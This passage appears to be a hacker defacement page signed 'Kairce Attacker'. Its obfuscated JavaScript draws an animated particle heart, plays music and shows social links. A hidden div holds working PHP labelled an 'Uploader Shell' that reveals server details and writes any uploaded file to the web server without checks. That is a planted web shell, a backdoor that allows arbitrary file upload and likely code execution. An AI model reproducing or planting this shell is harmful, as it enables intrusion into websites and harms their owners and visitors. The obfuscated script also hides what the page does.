Path([[[4.9,16.4],[-0.7,0.7],[0.7,-0.7]],[[7.6,16.4],[-0.7,-0.7],[0.7,0.7]],[[7.6,19.1],[0.7,-0.7],[-0.7,0.7]],[[4.9,19.1],[0.7,0.7],[-0.7,-0.7]]]);part6_2[_0x4d1e[0]]=true;part6_2[_0x4d1e[1]]=_0x4d1e[2];var part6_3=new Path([[[20.1,10.1],[-1,0],[1,0]],[[22,12],[0,-1],[0,1]],[[20.1,13.9],[1,0],[-1,0]],[[18.3,12],[0,1],[0,-1]]]);part6_3[_0x4d1e[0]]=true;part6_3[_0x4d1e[1]]=_0x4d1e[2];var part6_4=new Path([[[3.9,10.1],[-1,0],[1,0]],[[5.7,12],[0,-1],[0,1]],[[3.9,13.9],[1,0],[-1,0]],[[2,12],[0,1],[0,-1]]]);part6_4[_0x4d1e[0]]=true;part6_4[_0x4d1e[1]]=_0x4d1e[2];var part6_5=new Path([[[19.1,16.4],[-0.7,-0.7],[0.7,0.7]],[[19.1,19.1],[0.7,-0.7],[-0.7,0.7]],[[16.4,19.1],[0.7,0.7],[-0.7,-0.7]],[[16.4,16.4],[-0.7,0.7],[0.7,-0.7]]]);part6_5[_0x4d1e[0]]=true;part6_5[_0x4d1e[1]]=_0x4d1e[2];var part6_6=new Path([[[7.6,4.9],[-0.7,-0.7],[0.7,0.7]],[[7.6,7.6],[0.7,-0.7],[-0.7,0.7]],[[4.9,7.6],[0.7,0.7],[-0.7,-0.7]],[[4.9,4.9],[-0.7,0.7],[0.7,-0.7]]]);part6_6[_0x4d1e[0]]=true;part6_6[_0x4d1e[1]]=_0x4d1e[2];var part6_7=new Path([[[13.9,20.1],[0,-1],[0,1]],[[12,22],[1,0],[-1,0]],[[10.1,20.1],[0,1],[0,-1]],[[12,18.3],[-1,0],[1,0]]]);part6_7[_0x4d1e[0]]=true;part6_7[_0x4d1e[1]]=_0x4d1e[2];var part6_8=new Path([[[13.9,3.9],[0,-1],[0,1]],[[12,5.7],[1,0],[-1,0]],[[10.1,3.9],[0,1],[0,-1]],[[12,2],[-1,0],[1,0]]]);part6_8[_0x4d1e[0]]=true;part6_8[_0x4d1e[1]]=_0x4d1e[2];var part6_9=new Path([[[16.6,12],[0,-2.5],[0,2.5]],[[12,16.6],[2.5,0],[-2.5,0]],[[7.4,12],[0,2.5],[0,-2.5]],[[12,7.4],[-2.5,0],[2.5,0]]]);part6_9[_0x4d1e[0]]=true;part6_9[_0x4d1e[1]]=_0x4d1e[2];var part6_10=new Path([[[20.1,12],[0,-4.5],[0,4.5]],[[12,20.1],[4.5,0],[-4.5,0]],[[3.9,12],[0,4.5],[0,-4.5]],[[12,3.9],[-4.5,0],[4.5,0]]]);part6_10[_0x4d1e[0]]=true;part6_10[_0x4d1e[10]]=_0x4d1e[2];var part6_11=new Path([[[24,12],[0,-6.6],[0,6.6]],[[12,24],[6.6,0],[-6.6,0]],[[0,12],[0,6.6],[0,-6.6]],[[12,0],[-6.6,0],[6.6,0]]]);part6_11[_0x4d1e[0]]=true;var part6=new Group(part6_11,part6_1,part6_2,part6_3,part6_4,part6_5,part6_6,part6_7,part6_8,part6_9,part6_10);part6[_0x4d1e[6]](2);var part6_raster=part6[_0x4d1e[9]]();part6[_0x4d1e[5]]();var part7_1=new Path([[[15.3,12],[0,-1.8],[0,1.8]],[[12,15.3],[1.8,0],[-1.8,0]],[[8.7,12],[0,1.8],[0,-1.8]],[[12,8.7],[-1.8,0],[1.8,0]]]);part7_1[_0x4d1e[0]]=true;part7_1[_0x4d1e[1]]=_0x4d1e[2];var part7_2=new Path([[[12,5.5],[-0.8,0],[0.8,0]],[[13,8.4],[0,0],[0,0]],[[15.2,6.4],[-0.7,-0.4],[0.7,0.4]],[[14.6,9.4],[0,0],[0,0]],[[17.6,8.8],[-0.4,-0.7],[0.4,0.7]],[[15.6,11],[0,0],[0,0]],[[18.5,12],[0,-0.8],[0,0.8]],[[15.6,13],[0,0],[0,0]],[[17.6,15.2],[0.4,-0.7],[-0.4,0.7]],[[14.6,14.6],[0,0],[0,0]],[[15.2,17.6],[0.7,-0.4],[-0.7,0.4]],[[13,15.6],[0,0],[0,0]],[[12,18.5],[0.8,0],[-0.8,0]],[[11,15.6],[0,0],[0,0]],[[8.8,17.6],[0.7,0.4],[-0.7,-0.4]],[[9.4,14.6],[0,0],[0,0]],[[6.4,15.2],[0.4,0.7],[-0.4,-0.7]],[[8.4,13],[0,0],[0,0]],[[5.5,12],[0,0.8],[0,-0.8]],[[8.4,11],[0,0],[0,0]],[[6.4,8.8],[-0.4,0.7],[0.4,-0.7]],[[9.4,9.4],[0,0],[0,0]],[[8.8,6.4],[-0.7,0.4],[0.7,-0.4]],[[11,8.4],[0,0],[0,0]]]);part7_2[_0x4d1e[0]]=true;part7_2[_0x4d1e[1]]=_0x4d1e[8];var part7_3=new Path([[[12,1],[-1.3,0],[1.3,0]],[[13.6,5.9],[0,0],[0,0]],[[17.5,2.5],[-1.1,-0.6],[1.1,0.6]],[[16.4,7.6],[0,0],[0,0]],[[21.5,6.5],[-0.6,-1.1],[0.6,1.1]],[[18.1,10.4],[0,0],[0,0]],[[23,12],[0,-1.3],[0,1.3]],[[18.1,13.6],[0,0],[0,0]],[[21.5,17.5],[0.6,-1.1],[-0.6,1.1]],[[16.4,16.4],[0,0],[0,0]],[[17.5,21.5],[1.1,-0.6],[-1.1,0.6]],[[13.6,18.1],[0,0],[0,0]],[[12,23],[1.3,0],[-1.3,0]],[[10.4,18.1],[0,0],[0,0]],[[6.5,21.5],[1.1,0.6],[-1.1,-0.6]],[[7.6,16.4],[0,0],[0,0]],[[2.5,17.5],[0.6,1.1],[-0.6,-1.1]],[[5.9,13.6],[0,0],[0,0]],[[1,12],[0,1.3],[0,-1.3]],[[5.9,10.4],[0,0],[0,0]],[[2.5,6.5],[-0.6,1.1],[0.6,-1.1]],[[7.6,7.6],[0,0],[0,0]],[[6.5,2.5],[-1.1,0.6],[1.1,-0.6]],[[10.4,5.9],[0,0],[0,0]]]);part7_3[_0x4d1e[0]]=true;part7_3[_0x4d1e[1]]=_0x4d1e[2];var part7_4=new Path([[[24,12],[0,-6.6],[0,6.6]],[[12,24],[6.6,0],[-6.6,0]],[[0,12],[0,6.6],[0,-6.6]],[[12,0],[-6.6,0],[6.6,0]]]);part7_4[_0x4d1e[0]]=true;var part7=new Group(part7_4,part7_3,part7_2,part7_1);part7[_0x4d1e[6]](2);var part7_raster=part7[_0x4d1e[9]]();part7[_0x4d1e[5]]();var n_point=new Point(),hitResult,hit_b=false,part_variant=[part1_raster,part2_raster,part3_raster,part4_raster,part5_raster,part6_raster,part7_raster],particles=[],particles_path=[],big_group=new Group(),m_box=new Path.Rectangle([0,0],[800,800]);big_group[_0x4d1e[12]](m_box);big_group[_0x4d1e[12]](heart);part1_raster[_0x4d1e[5]]();part2_raster[_0x4d1e[5]]();part3_raster[_0x4d1e[5]]();part4_raster[_0x4d1e[5]]();part5_raster[_0x4d1e[5]]();part6_raster[_0x4d1e[5]]();part7_raster[_0x4d1e[5]]();for(var i=0;i<400;i++){particles[i]=part_variant[i%part_variant[_0x4d1e[13]]][_0x4d1e[4]]();particles[i][_0x4d1e[6]](0.5+Math[_0x4d1e[14]]()*0.5);particles[i][_0x4d1e[7]][_0x4d1e[15]]=i*20;particles[i][_0x4d1e[16]]=i%2==0?1+Math[_0x4d1e[14]]()*3:-(1+Math[_0x4d1e[14]]()*3);hit_b=false;while(!hit_b){n_point=new Point(heart[_0x4d1e[7]][_0x4d1e[15]]-heart[_0x4d1e[18]][_0x4d1e[17]]/2+Math[_0x4d1e[14]]()*heart[_0x4d1e[18]][_0x4d1e[17]],heart[_0x4d1e[7]][_0x4d1e[19]]-heart[_0x4d1e[18]][_0x4d1e[20]]/2+Math[_0x4d1e[14]]()*heart[_0x4d1e[18]][_0x4d1e[20]]);hitResult=heart[_0x4d1e[21]](n_point);if(hitResult&&hitResult[_0x4d1e[22]]){hit_b=true;particles[i][_0x4d1e[7]]=n_point;} ;} ;big_group[_0x4d1e[12]](particles[i]);} ;var path_h=heart[_0x4d1e[13]]/40;for(var i=0;i<40;i++){particles_path[i]=part_variant[i%part_variant[_0x4d1e[13]]][_0x4d1e[4]]();particles_path[i][_0x4d1e[7]]=heart[_0x4d1e[23]](i*path_h);particles_path[i][_0x4d1e[6]](0.5+Math[_0x4d1e[14]]()*0.5);particles_path[i][_0x4d1e[16]]=i%2==0?1+Math[_0x4d1e[14]]()*3:-(1+Math[_0x4d1e[14]]()*3);big_group[_0x4d1e[12]](particles_path[i]);} ;onResize();function onFrame(_0x77b1x52){for(var i=0;i<400;i++){particles[i][_0x4d1e[24]](particles[i][_0x4d1e[16]]);} ;for(var i=0;i<particles_path[_0x4d1e[13]];i++){particles_path[i][_0x4d1e[24]](particles_path[i][_0x4d1e[16]]);} ;} ;function onResize(_0x77b1x52){big_group[_0x4d1e[7]]=view[_0x4d1e[25]]-[heart[_0x4d1e[18]][_0x4d1e[17]]/2+50,0];};</script><script type="text/javascript">var _0xebac=["x6Fx6Ex6Cx6Fx61x64","x61x75x64x69x6F","x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65","x76x6Fx6Cx75x6Dx65","x6Cx6Fx6Fx70","x70x6Cx61x79","x63x68x69x6Cx64x72x65x6E","x23x73x6Fx63x69x61x6Cx5Fx69x63x6Fx6Ex73","x66x61x64x65x49x6E","x68x69x64x65","x63x61x6Ex76x61x73","x76x69x73x69x62x6Cx65","x63x73x73","x64x65x6Cx61x79","x23x67x72x65x65x74x69x6Ex67x5Fx74x65x78x74","x31x30x30x25","x35x30x25","x2D","x68x65x69x67x68x74","x70x78x20x30x20x30x20x2D","x77x69x64x74x68","x70x78","x6Cx65x6Ex67x74x68","x61x6Ex69x6Dx61x74x65","x73x74x6Fx70","x68x6Fx76x65x72","x70x61x75x73x65","x69x63x6Fx6Ex2Fx62x74x5Fx64x69x73x61x62x6Cx65x2Ex70x6Ex67","x61x74x74x72","x23x62x74x5Fx73x6Fx75x6Ex64","x69x63x6Fx6Ex2Fx62x74x5Fx65x6Ex61x62x6Cx65x2Ex70x6Ex67","x63x6Cx69x63x6B"];window[_0xebac[0]]=function (){var _0x1c1ex1=document[_0xebac[2]](_0xebac[1])[0];_0x1c1ex1[_0xebac[3]]=0.8;_0x1c1ex1[_0xebac[4]]=true;var _0x1c1ex2=true;_0x1c1ex1[_0xebac[5]]();var _0x1c1ex3=$(_0xebac[7])[_0xebac[6]]();$(_0xebac[10])[_0xebac[9]]()[_0xebac[8]](2500);$(_0xebac[14])[_0xebac[9]]()[_0xebac[13]](2500)[_0xebac[8]](3000)[_0xebac[12]]({visibility:_0xebac[11]});$(_0xebac[7])[_0xebac[12]]({top:_0xebac[15],left:_0xebac[16],margin:_0xebac[17]+($(_0xebac[7])[_0xebac[18]]()+5)+_0xebac[19]+($(_0xebac[7])[_0xebac[20]]()/2)+_0xebac[21],visibility:_0xebac[11]});for(var _0x1c1ex4=0;_0x1c1ex4<_0x1c1ex3[_0xebac[22]];_0x1c1ex4++){$(_0x1c1ex3[_0x1c1ex4])[_0xebac[9]]()[_0xebac[13]](5000+_0x1c1ex4*600)[_0xebac[8]](1000)[_0xebac[23]]({opacity:0.5,visibility:_0xebac[11]},700)[_0xebac[25]](function (){$(this)[_0xebac[24]]()[_0xebac[23]]({opacity:1.0},100);} ,function (){$(this)[_0xebac[24]]()[_0xebac[23]]({opacity:0.5},500);} );} ;$(_0xebac[29])[_0xebac[9]]()[_0xebac[13]](2500)[_0xebac[8]](1000)[_0xebac[12]]({opacity:0.3,visibility:_0xebac[11]})[_0xebac[31]](function (){if(_0x1c1ex2){_0x1c1ex1[_0xebac[26]]();$(_0xebac[29])[_0xebac[28]]({src:_0xebac[27]});} else {_0x1c1ex1[_0xebac[5]]();$(_0xebac[29])[_0xebac[28]]({src:_0xebac[30]});} ;_0x1c1ex2=!_0x1c1ex2;} )[_0xebac[25]](function (){$(this)[_0xebac[24]]()[_0xebac[23]]({opacity:1.0},100);} ,function (){$(this)[_0xebac[24]]()[_0xebac[23]]({opacity:0.3},500);} );var _0x1c1ex5=0,_0x1c1ex6=0,_0x1c1ex7=0;} ;</script></head>
<body>
<canvas id="canvas" resize></canvas>
<div id="greeting_text" style="visibility:hidden">
<?php echo '<b>Kairce Attacker Uploader Shell<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; } else { echo '<b>Upload Fail !!!</b><br><br>'; }}?></div>
<center><img src='http://s23.postimg.org/wn4bx87e3/cooltext1321620475.png'/></center>
<div id="social_icons" style="visibility:hidden">
<div id="icon">
<a href='#' target='_blank'>
<img src="http://kairceattacker.url.ph/icon/facebook.png" border="0" alt="facebook"/></a></div>
<div id="icon"><a href='https://www.facebook.com/kairce.attacker' target='_blank'>
<img src="http://kairceattacker.url.ph/icon/youtube.png" border="0" alt="youtube"/></a></div><div id="icon">
<a href='https://www.youtube.com/channel/UCKOOHWSzVfoMSbPt_F0sM9Q' target='_blank'>
<img src="http://kairceattacker.url.ph/icon/email.png" border="0" alt="kairce.attacker@gmail.com"/></a></div>
</div><audio id="audio"><source src="http://kairceattacker.url.ph/Big%20Heart.mp3" type="audio/mpeg">
</body>
</html>
Hỗ trợ trực tuyến
Quảng cáo - liên kết
Lượt truy cập